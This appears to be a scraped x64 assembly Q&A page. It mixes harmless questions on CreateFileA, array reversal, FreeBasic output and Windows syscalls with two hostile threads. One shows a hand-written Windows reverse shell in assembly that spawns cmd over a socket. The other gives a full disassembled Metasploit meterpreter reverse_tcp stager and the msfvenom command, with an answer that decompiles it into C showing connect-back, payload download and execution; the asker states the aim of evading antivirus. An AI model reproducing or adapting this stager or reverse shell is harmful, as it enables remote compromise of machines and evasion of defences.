CreateFileA in Windows API in NASM 64 revisited: invalid parameter - windows

I am creating a file in NASM 64 using CreateFileA in the Windows API. Yesterday I posted a question on this, which brought out some useful comments. Today I wrote this section in C and compliled it with Pelles C compiler, and got the disassembly from x64dbg so I can use the output in NASM. I put the disassembly code into my NASM project, and here's the program in NASM as it is now:
CreateAuditFile:
sub rsp,38
xor eax,eax
mov qword [rsp+30],rax
mov eax,80
mov dword [rsp+28],eax
mov eax,2
mov dword [rsp+20],eax
xor r9,r9
xor r8d,r8d
mov edx,40000000
mov rcx,FileName_1
;lea rcx,[rel FileName_1]
call CreateFileA
call GetLastError
mov rdi,FileAuditString ; not from the disassembly
mov [rdi],rax ; not from the disassembly
xor eax,eax
add rsp,38
ret
That's the disassembly of this C code (done as a console app):
int main(void)
{
char* File_Name ="C:\\Audit_File_P1";
HANDLE hFile;
hFile = CreateFileA(
File_Name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
}
This works in C, but in NASM it returns an error code 87, "invalid parameter." I notice two things: (1) the first line is sub rsp,38, which is an odd number and not 16-byte aligned; (2) for the file name (FileName_1), the disassembly shows
"lea rcx,qword ptr ds:[140006270]" but in NASM we use "mov rcx,FileName_1" instead of lea where the file name string is defined in the .data section, as it is here (FileName_1: db "c:\AuditFile_1.txt",0). Also, it inserts a qword parameter at [rsp+30] and a dword at [rsp+28] but a dword needs four bytes, not two, which seems wrong but it works from the C version.
So my question is: which parameter(s) is/are incorrect?
Thanks very much.

This problem was solved with the help of others above, and I am posting the full correct code below for others who need this information in the future:
CreateAuditFile:
mov rcx,FileName_1
sub rsp,56 ; 38h
xor eax,eax
mov qword [rsp+48],rax ; 30h
mov eax,80
mov dword [rsp+40],eax ; 28h
mov eax,2
mov dword [rsp+32],eax ; 20h
xor r9,r9
xor r8d,r8d
mov edx,40000000
call CreateFileA
mov rdi,OutputFileHandle
mov [rdi+r15],rax
xor eax,eax
add rsp,56 ;38h
ret
Here is what changed (changes are followed by a comment and ***):
CreateAuditFile:
sub rsp,38 - should be sub rsp,56 ***
xor eax,eax
mov qword [rsp+30],rax - should be mov qword [rsp+48],rax ***
mov eax,80
mov dword [rsp+28],eax - should be mov dword [rsp+40],eax ***
mov eax,2
mov dword [rsp+20],eax - should be mov dword [rsp+32],eax ***
xor r9,r9
xor r8d,r8d
mov edx,40000000
mov rcx,FileName_1
call CreateFileA
call GetLastError - do not call this without testing the result of CreateFileA ***
mov rdi,FileAuditString - not needed ***
mov [rdi],rax - not needed ***
mov rdi,OutputFileHandle - use this to capture the file handle ***
mov [rdi+r15],rax - use this to capture the file handle ***
xor eax,eax
add rsp,38 - should be add rsp,56 ***
ret
Thanks very much to everyone who responded.

Related

when writing 64bit reverse shell in assembly got stuck at createrprocessA api

hello i am writing windows 64bit reverse shell in assembly and after gett connected to the targetmachine ip, i want to create process to spwan a shell, fistly i try to write startinfo struct for createprocess api, but after then i pass all the parameters to the function but it doesn't work, and here is full code https://pastebin.com/6Ft2jCMX
;STARTUPINFOA+PROCESS_INFORMATION
;----------------------------------
push byte 0x12 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop rcx ; Set ECX for the loop
xor r11,r11
push_loop:
push r11 ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
lea r12,[rsp]
mov dl,104
xor rcx,rcx
mov [r12],dword edx
mov [r12+4],rcx
mov [r12+12],rcx
mov [r12+20],rcx
mov [r12+24],rcx
xor rdx,rdx
mov dl,255
inc rdx
mov [r12+0x3c],edx
mov [r12+0x50],r14 ; HANDLE hStdInput;
mov [r12+0x58],r14 ; HANDLE hStdOutput;
mov [r12+0x60],r14 ;HANDLE hStdError;
;createprocessA_calling
sub rsp, 0x70
push 'cmdA'
mov [rsp+3],byte dl
lea rdx,[rsp]
inc rcx
mov [rsp+32],rcx
xor rcx,rcx
xor r8,r8
mov [rsp+40],r8
mov [rsp+48],r8
mov [rsp+56],r8
lea r9,[r12]
mov [rsp+64],r9
lea r9,[r12+104]
mov [rsp+72],r9
xor r9,r9
call rbx ;createprocessA
so at last when i call the createprocessA it got stuck

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
_main:
push rbp
lea rdi, [rel array]
call _printy
call _reverse
call _printy
pop rbp
call _exit
_reverse:
push rbp
lea rsi, [rdi + 4 * (length - 1) ]
.LOOP2:
cmp rdi, rsi
jge .DONE2
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
add rdi,4
sub rsi,4
jmp .LOOP2
.DONE2:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
_printy:
push rbp
xor rcx, rcx
mov r8, rdi
.loop:
cmp rcx, length
jge .done
push rcx
push r8
lea rdi, [rel msg]
mov rsi, [r8 + rcx * 4]
xor rax, rax
call _printf
pop r8
pop rcx
add rcx, 1
jmp .loop
.done:
xor rax, rax
lea rdi, [rel array]
pop rbp
ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

Are I/O statements in FreeBasic compiled as function calls?

Example:
Dim x As Integer, y As Integer
Input "x=", x
y = x ^ 3 + 3 * x ^ 2 - 24 * x + 30
Print y
End
When I used FreeBasic compiler to generate the assembly code of this source code, I found
.globl _main
_main:
and
call ___main
in assembly code. In addition, it looks like that the Input statement is compiled as
call _fb_ConsoleInput#12
and
call _fb_InputInt#4
The "^" operator is compiled as
call _pow
(I am not sure whether the math function library of FreeBasic is integrated or external)
and the Print statement is compiled as
call _fb_PrintInt#12
and the End statement is compiled as
call _fb_End#4
The question is: How is FreeBasic source code compiled? Why _main and ___main appeared in assembly code? Are I/O statements compiled as function calls?
Reference: Assembly code generated by FreeBasic compiler
.intel_syntax noprefix
.section .text
.balign 16
.globl _main
_main:
push ebp
mov ebp, esp
and esp, 0xFFFFFFF0
sub esp, 20
mov dword ptr [ebp-4], 0
call ___main
push 0
push dword ptr [ebp+12]
push dword ptr [ebp+8]
call _fb_Init#12
.L_0002:
mov dword ptr [ebp-8], 0
mov dword ptr [ebp-12], 0
push -1
push 0
push 2
push offset _Lt_0004
call _fb_StrAllocTempDescZEx#8
push eax
call _fb_ConsoleInput#12
lea eax, [ebp-8]
push eax
call _fb_InputInt#4
push dword ptr [_Lt_0005+4]
push dword ptr [_Lt_0005]
fild dword ptr [ebp-8]
sub esp,8
fstp qword ptr [esp]
call _pow
add esp, 16
fild dword ptr [ebp-8]
fild dword ptr [ebp-8]
fxch st(1)
fmulp
fmul qword ptr [_Lt_0005]
fxch st(1)
faddp
mov eax, dword ptr [ebp-8]
imul eax, 24
push eax
fild dword ptr [esp]
add esp, 4
fxch st(1)
fsubrp
fadd qword ptr [_Lt_0006]
fistp dword ptr [ebp-12]
push 1
push dword ptr [ebp-12]
push 0
call _fb_PrintInt#12
push 0
call _fb_End#4
.L_0003:
push 0
call _fb_End#4
mov eax, dword ptr [ebp-4]
mov esp, ebp
pop ebp
ret
.section .data
.balign 4
_Lt_0004: .ascii "x=\0"
.balign 8
_Lt_0005: .quad 0x4008000000000000
.balign 8
_Lt_0006: .quad 0x403E000000000000
Yes, things like PRINT are implemented as function calls, though i am not sure why this matters to you unless you are currently learning assembly.
As for _main, that is the ASM name for the main() C function used as the main program.
On x86, it is common for global/exported function names in C to be preceded by _ in the ASM output.
___main is the ASM name for the __main() C function called by the MinGW C runtime library startup code before anything in _main is executed.
Again, you'll see the extra _ preceding the C function name.
After that is a call to fb_Init(argc, argv, FB_LANG_FB) to initialize the FreeBASIC runtime library with the default "fb" FreeBASIC dialect and argc elements in the argument vector argv.
The #12 means the argument list is 12 bytes long (e.g., 4+4+4=12 as with fb_Init here); see __stdcall | Microsoft Docs for more information on that.

How to get Windows system calls assembly statically?

I am trying to find a specific pattern in the Windows system calls, for research purposes.
So far i've been looking into the Windows dlls such as ntdll.dll, user32.dll, etc., but those seem to contain only wrapper codes for preparing to jump to the system call. For example:
mov eax, 101Eh
lea edx, [esp+arg_0]
mov ecx, 0
call large dword ptr fs:0C0h
retn 10h
I'm guessing the call large dword ptr fs:0C0h instruction is another gateway in the chain that finally leads to the actual assembly, but I was wondering if I can get to that assembly directly.
You're looking in the wrong dlls. The system calls are in ntoskrnl.exe.
If you look at NtOpenFile() in ntoskrnl.exe you'll see:
mov r11, rsp
sub rsp, 88h
mov eax, [rsp+88h+arg_28]
xor r10d, r10d
mov [r11-10h], r10
mov [rsp+88h+var_18], 20h ; int
mov [r11-20h], r10d
mov [r11-28h], r10
mov [r11-30h], r10d
mov [r11-38h], r10d
mov [r11-40h], r10
mov [rsp+88h+var_48], eax ; int
mov eax, [rsp+88h+arg_20]
mov [rsp+88h+var_50], 1 ; int
mov [rsp+88h+var_58], eax ; int
mov [r11-60h], r10d
mov [r11-68h], r10
call IopCreateFile
add rsp, 88h
retn
Which is the true body of the function. Most of the work is done in IopCreateFile(), but you can follow it statically and do whatever analysis you need.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
mov r8d,[rax+0x24]
add r8,rdx
mov cx,[r8+rcx*2]
mov r8d,[rax+0x1c]
add r8,rdx
mov eax,[r8+rcx*4]
add rax,rdx
pop r8
pop r8
pop rsi
pop rcx
pop rdx
pop r8
pop r9
pop r10
sub rsp,byte +0x20
push r10
jmp rax
second_jmp:
pop rax
first_jmp:
pop r9
pop rdx
mov rdx,[rdx]
jmp dword fifth_jmp ;0x21
first_call:
pop rbp
mov r14,0x32335f327377
push r14
mov r14,rsp
sub rsp,0x1a0
mov r13,rsp
mov r12,0x6900a8c05c110002
push r12
mov r12,rsp
mov rcx,r14
mov r10d,0x726774c
call rbp
mov rdx,r13
push dword 0x101
pop rcx
mov r10d,0x6b8029
call rbp
push byte +0x5
pop r14
ninth_jmp:
push rax
push rax
xor r9,r9
xor r8,r8
inc rax
mov rdx,rax
inc rax
mov rcx,rax
mov r10d,0xe0df0fea
call rbp
mov rdi,rax
sixth_jmp:
push byte +0x10
pop r8
mov rdx,r12
mov rcx,rdi
mov r10d,0x6174a599
call rbp
test eax,eax
jz 0x15e
dec r14
jnz sixth_jmp ;0x13e
call second_call ;dword 0x1f1
sub rsp,byte +0x10
mov rdx,rsp
xor r9,r9
push byte +0x4
pop r8
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jng seventh_jmp ;0x1d1
add rsp,byte +0x20
pop rsi
mov esi,esi
push byte +0x40
pop r9
push dword 0x1000
pop r8
mov rdx,rsi
xor rcx,rcx
mov r10d,0xe553a458
call rbp
mov rbx,rax
mov r15,rax
tenth_jmp:
xor r9,r9
mov r8,rsi
mov rdx,rbx
mov rcx,rdi
mov r10d,0x5fc8d902
call rbp
cmp eax,byte +0x0
jnl eighth_jmp ;0x1e3
pop rax
push r15
pop rcx
push dword 0x4000
pop r8
push byte +0x0
pop rdx
mov r10d,0x300f2f0b
call rbp
seventh_jmp:
push rdi
pop rcx
mov r10d,0x614d6e75
call rbp
dec r14
jmp ninth_jmp ;0x11f
eighth_jmp:
add rbx,rax
sub rsi,rax
test rsi,rsi
jnz tenth_jmp ;0x1a2
jmp r15
second_call:
pop rax
push byte +0x0
pop rcx
mov r10,0x56a2b5f0
call rbp
Before making any changes to the ndisasm output (apart from modifying the call and jmp destinations from relative addresses to labels, see code above), I compiled and linked the output using:
nasm -f win64 -o meterpreter_reverse_tcp.o meterpreter_reverse_tcp.asm
/opt/mingw/x86_64-w64-mingw32/bin/ld -o meterpreter_reverse_tcp.exe meterpreter_reverse_tcp.o
But when I ran the .exe on my windows 10 machine, I got the following error:
Meterpreter_reverse_tcp.exe has stopped working. A problem caused the program to stop working correctly. Windows will close the program and notify you if a solution is available.
The output of the command 'file meterpreter_reverse_tcp.exe' is:
meterpreter_reverse_tcp.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
What did I do wrong ?
your shell code if convert it to c/c++ is next:
LoadLibraryA("ws2_32");
WSADATA wd;
WSAStartup(MAKEWORD(1,1), &wd);
loop:
SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, 0, 0, 0, 0);
SOCKADDR_IN sa = { AF_INET, _byteswap_ushort(4444) };
sa.sin_addr.s_addr = IP(192, 168, 0, 105);
// try 5 times connect to 192.168.0.105
int n = 5;
do
{
if (connect(s, (sockaddr*)&sa, sizeof(SOCKADDR_IN)) == NOERROR)
{
// we connected
break;
}
} while (--n);
ExitProcess(0);// !! error in shellcode or special damaged ?
ULONG len;
// get the length of shellcode
if (0 < recv(s, (char*)&len, sizeof(len), 0))
{
// allocate buffer for shellcode
PVOID pv = VirtualAlloc(0, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
char* buf = (char*)pv;
// download shellcode in loop
do
{
if (0 > (n = recv(s, buf, len, 0)))
{
// download fail
// bug !!
// must be MEM_RELEASE for free memory, but used MEM_DECOMMIT in code.
VirtualFree(pv, 0, MEM_DECOMMIT);
closesocket(s);
goto loop;
}
} while (buf += n, len -= n);
// all shellcode downloaded
// call it
((FARPROC)pv)();
}
ExitProcess(0);
it i be say worked under debugger. if something not worked for you - debug it. especially put bp on jmp rax - the begin of shell code is function which search for exported api (by hash) and call it (jmp rax)

Resources